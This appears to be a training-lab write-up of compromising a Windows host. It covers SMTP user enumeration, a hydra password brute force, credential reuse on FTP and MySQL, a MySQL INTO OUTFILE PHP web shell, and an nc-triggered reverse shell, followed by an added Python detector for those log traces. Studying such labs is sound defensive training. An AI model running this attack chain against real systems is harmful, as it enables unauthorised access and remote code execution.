Acs Easy Lab

Nmap:

nmap -sCV 10.129.62.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-10 14:14 EST
Nmap scan report for 10.129.62.133
Host is up (0.074s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
|     Command unknown, not supported or not allowed...
|     Command unknown, not supported or not allowed...
|   NULL, SMBProgNeg: 
|_    220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.62.133/dashboard/
443/tcp  open  ssl/https     Core FTP HTTPS Server
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Server: Core FTP HTTPS Server
|_http-server-header: Core FTP HTTPS Server
587/tcp  open  smtp          hMailServer smtpd
3306/tcp open  mysql         MySQL 5.5.5-10.4.24-MariaDB
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Nmap done: 1 IP address (1 host up) scanned in 43.25 seconds

The Nmap scan shows the following open services: Core FTP Server 2.0 on 21/tcp, hMailServer SMTP on 25/tcp and 587/tcp, Apache HTTP Server on 80/tcp, an HTTPS server on 443/tcp that is also served by Core FTP rather than Apache, MySQL/MariaDB on 3306/tcp, and Terminal Services on 3389/tcp.

  1. User enumeration

Enumerate the SMTP server #SMTP to find a valid user:

smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.132.11

I found a valid user returned: fiona@inlanefreight.htb

  2. Brute-forcing fiona's password against the SMTP server
    #brute_forcing_SMTP
hydra -l fiona@inlanefreight.htb -P /usr/share/wordlists/rockyou.txt -f 10.129.62.133 smtp

Found credential:

fiona@inlanefreight.htb:987654321
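
As an added defensive counterpart to steps 1 and 2 (not part of the original write-up), the following Python script flags the traces those two tools leave in the mail server log: a burst of 550 replies to RCPT TO from one client, and repeated 535 AUTH failures. The tab-separated log layout is an assumption modelled loosely on hMailServer's SMTPD log, and every address and event in the sample is constructed.

```python
import re
from collections import Counter, defaultdict

# Layout assumed to resemble hMailServer's tab-separated SMTPD log:
# component, thread, session, timestamp, client IP, message. The
# addresses and events below are constructed, not captured from the lab.
LINE_RE = re.compile(r'^"SMTPD"\t\d+\t(\d+)\t"[^"]*"\t"([^"]+)"\t"([^"]*)"$')

def _line(session, ip, msg):
    return f'"SMTPD"\t1\t{session}\t"2025-01-10 14:20:00"\t"{ip}"\t"{msg}"'

PROBE_IP, USER_IP = "10.10.14.5", "10.129.1.20"  # constructed client addresses
_lines = []
for i, user in enumerate(["alice", "bob", "carol", "dave", "erin", "fiona"]):
    _lines.append(_line(100 + i, PROBE_IP, f"RECEIVED: RCPT TO:<{user}@inlanefreight.htb>"))
    _lines.append(_line(100 + i, PROBE_IP, "SENT: 250 OK" if user == "fiona" else "SENT: 550 Unknown user"))
for i in range(6):  # repeated AUTH failures, one per session
    _lines.append(_line(200 + i, PROBE_IP, "RECEIVED: AUTH LOGIN"))
    _lines.append(_line(200 + i, PROBE_IP, "SENT: 535 Authentication failed."))
_lines += [_line(300, USER_IP, "RECEIVED: RCPT TO:<typo@inlanefreight.htb>"),
           _line(300, USER_IP, "SENT: 550 Unknown user")]  # a single genuine typo
SAMPLE_LOG = "\n".join(_lines)

def parse(log_text):
    """Yield (session, ip, message) for each SMTPD line; skip other lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3)

def analyze(log_text, rcpt_threshold=5, auth_threshold=5):
    """Return {ip: [reasons]} for clients exceeding either threshold."""
    last_cmd, auth_fails, rcpt_rejects = {}, Counter(), Counter()
    rcpt_targets = defaultdict(set)
    for session, ip, msg in parse(log_text):
        if msg.startswith("RECEIVED: "):
            last_cmd[session] = msg[len("RECEIVED: "):]
        elif msg.startswith("SENT: 550") and last_cmd.get(session, "").upper().startswith("RCPT TO:"):
            rcpt_rejects[ip] += 1  # 550 in reply to RCPT TO = probe of a nonexistent mailbox
            rcpt_targets[ip].add(last_cmd[session].split(":", 1)[1].strip("<> "))
        elif msg.startswith("SENT: 535"):
            auth_fails[ip] += 1
    findings = defaultdict(list)
    for ip, n in rcpt_rejects.items():
        if n >= rcpt_threshold:
            findings[ip].append(f"{n} rejected RCPT TO across {len(rcpt_targets[ip])} recipients (user enumeration)")
    for ip, n in auth_fails.items():
        if n >= auth_threshold:
            findings[ip].append(f"{n} failed AUTH attempts (password guessing)")
    return dict(findings)
```

Running analyze(SAMPLE_LOG) flags only the probing client, while the single mistyped recipient from the other address stays under the threshold.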
  3. Try to use the credential on various services

Core FTP:
Logging in with fiona's credentials yielded two files:
#credential_stuffing

└─$ cat WebServersInfo.txt
CoreFTP:
Directory C:\CoreFTP
Ports: 21 & 443
Test Command: curl -k -H "Host: localhost" --basic -u <username>:<password> https://localhost/docs.txt

Apache
Directory "C:\xampp\htdocs\"
Ports: 80 & 4443
Test Command: curl http://localhost/test.php

and

└─$ cat docs.txt          
I'm testing the FTP using HTTPS, everything looks good.

I could also use fiona's credentials to access the Core FTP server through HTTPS, but that is the same as using the ftp command.

MySQL:
#mysql

mysql -u fiona -p987654321 -h 10.129.62.133
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

Use the --skip-ssl flag to get around this:

mysql -u fiona -p987654321 -h 10.129.57.244 --skip-ssl
  4. Writing Files onto the Web Server

from WebServerInfo.txt, we can see that the directory of the web server is C:\xampp\htdocs\, with this information, we can leverage the writing local files function in mysql to write a reverse shell into the web server directory.
#file_upload #reverse_shell

SELECT "<?php echo shell_exec('this is where the revshell command goes');?>" INTO OUTFILE 'C:/xampp/htdocs/shell.php';

I obtained the reverse shell from revshells.com by choosing PowerShell #3 (Base64).
#windows #powershell
  5. Invoke the reverse shell

Start a listener:

nc -lvnp 4444

Request the file so that the web server executes it #web_app_hacking

curl http://10.129.57.244/shell.php

At this point I had a PowerShell reverse shell on my listener.

I struggled a lot with this lab, quite frankly. I only successfully captured the flag by looking at solutions online. My biggest mistake was not understanding the services running on the target system. HTTPS on port 443 is served by the Core FTP server, but it is NOT a web server, so I uploaded a shell onto the FTP server and hoped that clicking on it would make the server execute the file; I was wrong, it's not a web server, it's just FTP.

In order to execute a shell, I needed to upload it to the correct directory of the web server on the system, which is given in WebServersInfo.txt, which I had neglected. Moreover, I struggled quite a bit to bypass the TLS/SSL issue. I found that the --skip-ssl flag did the trick.